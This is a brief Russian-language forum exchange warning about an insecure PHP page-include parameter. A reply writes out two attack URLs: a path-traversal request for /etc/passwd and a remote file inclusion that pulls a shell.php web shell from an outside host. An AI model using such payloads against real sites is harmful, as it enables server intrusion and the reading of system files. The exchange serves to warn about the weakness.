Цитата:
Аккуратнее только с такими конструкциями, ибо таким макаром человек может запросить любую страницу с сервера, например так:
[Для просмотра данной ссылки нужно зарегистрироваться]
А это не есть гут...
|
Тогда уж
Код:
http://www.adress.ru/index.php?page=../../../../../etc/passwd
или ещё лучше
Код:
http://www.adress.ru/index.php?page=http://megaxeksite.narod.ru/shell.php
Ну в данном случае не катит, я проверял